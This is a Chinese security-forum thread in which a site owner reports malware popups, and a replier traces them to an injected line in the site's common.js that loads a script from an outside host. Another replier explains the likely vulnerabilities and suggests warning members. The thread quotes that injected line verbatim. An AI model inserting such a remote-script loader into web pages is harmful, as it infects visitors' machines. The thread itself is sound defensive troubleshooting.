瑞星卡卡安全论坛

      我的论坛最近不知道被什么病毒侵入，在每次开电脑第一次打开论坛的时候就会出现一个弹窗，阻止打开页面，刷新一下，论坛也可以完全打开！我们开始以为是内部错误，检查了好久都没有发现问题，最近这个软件程序还再不断的演变，



程序字符提示。一开始是以  ok.exe  。昨天是 go1.exe。今天又演变成。actvex.exe.  我再浏览别的网页的时候也发现有的网站也有这个问题，请教各位朋友，这是怎么回事！



我的论坛地址：http://bbs.gddgw.com/



阻止打开的弹窗图片

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; MAXTHON 2.0)

顶下！

登陆楼主提供的地址，报上述错误，看来是成为肉鸡了。

http://bbs.gddgw.com/include/javascript/common.js
该文件被挂马

恶意代码：
document.writeln("<script language=javascript src=http:\/\/www.cb71.cn\/a.js><\/script>")

楼上兄弟真是高招，已经完全解决！

不是去掉代码就可以高枕无忧的了，既然被挂马就肯定是存在漏洞的，比如论坛程序漏洞，服务器漏洞，服务器所在机房存在ARP攻击，同一服务器下的其他网站存在漏洞等等，很多可能性，都是安全隐患

而且刚才过去看的时候似乎没有发现贵站的会员有反应这件事的，如果时用firefox或者chrome浏览器的话，应该很容易看到3楼的那个提示。

除此以外建议你在你的论坛出个公告，提醒一下你的会员，以防那些防护不周的会员已经中毒。毕竟被挂的这一行代码继续跟踪的话能抓到不少网马